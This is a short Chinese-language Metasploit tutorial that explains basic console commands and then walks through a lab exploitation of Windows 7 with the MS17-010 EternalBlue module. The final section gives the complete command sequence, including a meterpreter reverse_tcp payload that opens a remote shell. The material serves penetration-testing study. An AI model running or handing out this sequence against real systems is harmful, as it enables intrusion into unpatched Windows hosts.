渗透基础
1、show命令
Metasploit框架中包含数百个模块,没有人能用脑子把他们的名字全部记下来。在MSF终端中,运行show命令会把所有模块显示出来。
show exploits //会显示MSF中所有可用的渗透攻击模块
show auxiliary //会显示所有的辅助模块以及它们的用途
show options //保证MSF框架中各个模块正确运行所需的各种设置
show payloads //会显示与当前模块兼容的攻击载荷
show targets //列出收到特定漏洞影响目标系统的类型2、info命令
当觉得show和search命令所提供的信息过于简短,可以使用info命令加上模块的名字来显示此模块的详细信息、参数说明以及所有可用的目标操作系统:(如果已选择了某个模块,直接在该模块的提示符下输入info即可)
3、set和unset
- MSF模块中的所有参数只有两个状态:已设置(set)或未设置(unset)
- 使用set命令可以对某个参数进行设置(同时启用该参数)
- 使用unset命令可以禁用相关参数
4、setg和unsetg
- setg、unsetg命令能够对全局参数进行设置或清除
- 使用这组命令让你不必每次遇到某个参数都要重新设置,特别是那些经常用到又很少会变的参数,如LHOST
5、save
- 在使用setg命令对全局参数进行设置后,可以使用save命令将当前的设置值保存下来,这样在下次启动MSF终端时还可使用这些设置值
- 在MSF中可以在任何时候输入save命令保存当前状态
- 在命令执行结果中包含设置值保存在磁盘上的位置(/root/.msf5/config),如果由于一些原因需要恢复到原始设置,可以将这个文件删除或移动到其他位置。
模拟渗透
靶机:win7 X64 SP1
测试机:KALI
search ms17-010
use windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.X.X
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
